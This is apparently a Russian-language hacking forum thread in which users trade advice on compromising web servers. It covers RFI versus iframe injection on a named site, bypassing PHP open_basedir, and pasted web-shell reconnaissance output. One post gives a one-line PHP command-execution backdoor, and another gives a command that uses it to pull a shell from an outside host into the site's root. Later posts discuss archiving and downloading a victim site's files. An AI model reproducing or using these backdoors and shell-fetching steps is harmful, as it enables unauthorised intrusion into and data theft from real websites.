Konqi абсолютно прав.ссылка открывается в iframe.складывается такое ощущение что ты знаешь о каком сайте идет речь)) ладно попробую.только узнаю как это делается для начала
Ну вот самый примитивный пример frame. _ttp://www.prodisney.ru/index.php?page=http://rambler.ru Это ну никак нельзя перепутать с RFI
Как обойти open_basedir? сколько не пробывал не получается) Code: [B]Server software:[/B] Apache/2.2.9 (FreeBSD) PHP/5.2.8 mod_ssl/2.2.9 OpenSSL/0.9.7e-p1 [B]Loaded Apache modules:[/B] core, prefork, http_core, mod_so, mod_authn_file, mod_authz_host, mod_authz_user, mod_auth_basic, mod_include, mod_log_config, mod_logio, mod_env, mod_mime_magic, mod_expires, mod_headers, mod_setenvif, mod_ssl, mod_mime, mod_autoindex, mod_suexec, mod_cgi, mod_dir, mod_actions, mod_userdir, mod_alias, mod_rewrite, mod_php5, mod_rpaf-2, mod_ispmgr [B]Disabled PHP Functions:[/B] none [B]Open base dir:[/B] /home/lc/data:. [B]cURL support:[/B] enabled [B]Supported databases:[/B] MySql (5.0.67), MSSQL, PostgreSQL [B]Readable /etc/passwd:[/B] no [B]Readable /etc/shadow:[/B] no [B]Userful:[/B] gcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip2, nc, locate, suidperl [B]Danger:[/B] ipfw [B]Downloaders:[/B] wget, fetch, lynx, curl, lwp-mirror
Попробуй тут посмотреть "Листинг директории за пределами open_basedir за счет разного ответа функций "linkinfo" и "realpath" на существующий и несуществующий файл."
Да сработало, создал файл с <?php system($_GET["cmd"]); ?> ------- P.S> OxoTnik спасибо, но уже сделал по другому))
скрипт_где_бекдор.php?cmd=phpinfo(); тут посмотри пути до скрипта скрипт_где_бекдор.php?cmd=copy("http://сайт_с_шелом.com/shell.txt","путь_к_корню_скрипта/2.php");
[offtop] последние 3 поста оставлю на память потомкам Прошу остальных модераторов не удалять сие посты =) [/offtop]
)) *Улыбнуло* Возник еще вопрос, пытаюсь заархивировать получаю: $ tar cjf /tmp/site.tar.bz2 /usr/local/psa/home/vhosts/site.ru/ 2>&1 /libexec/ld-elf.so.1: /usr/local/lib/liblzma.so.5: version XZ_5.0 required by /usr/lib/libarchive.so.5 not defined Code: Server software: Apache/2.0.63 (Unix) PHP/5.2.8 Loaded Apache modules: core, prefork, http_core, mod_so, mod_access, mod_auth, mod_auth_anon, mod_auth_dbm, mod_charset_lite, mod_include, mod_deflate, mod_log_config, mod_env, mod_mime_magic, mod_cern_meta, mod_expires, mod_headers, mod_usertrack, mod_unique_id, mod_setenvif, mod_mime, mod_status, mod_autoindex, mod_asis, mod_info, mod_cgi, mod_vhost_alias, mod_negotiation, mod_dir, mod_imap, mod_actions, mod_speling, mod_userdir, mod_alias, mod_rewrite, mod_suexec, mod_php5, mod_rpaf-2 Disabled PHP Functions: none Safe mode exec dir: /nonexec cURL support: enabled Supported databases: MySql (4.1.25) Readable /etc/passwd: yes [view] Readable /etc/shadow: no Userful: gcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip2, nc, locate Danger: clamd, ipfw, snort Downloaders: wget, fetch, lynx, links, curl, lwp-mirror
Проблема в том, что функция архивирования не найдена (не установлена) Для решения проблемы тебе нужны права root для выполнения операций chroot и /etc/rc.d/ldconfig start З.Ы. Могу ошибаться
Пробывал, но есть одна проблема он иногда папку в которой 2 текстовых документа по несколько кб. он скачивает как 10-300 мб, и показывает битый архив
Значит не так скачиваешь. Поднимайся на директорию выше. Указываешь галочкой папку, что собираешься скачать. Жмёшь Download. Попробуй.
ну форуме в логах засветилась шифрованная шляпа...я запостил вопрос - как дешифровать, потом сам дешифровал)
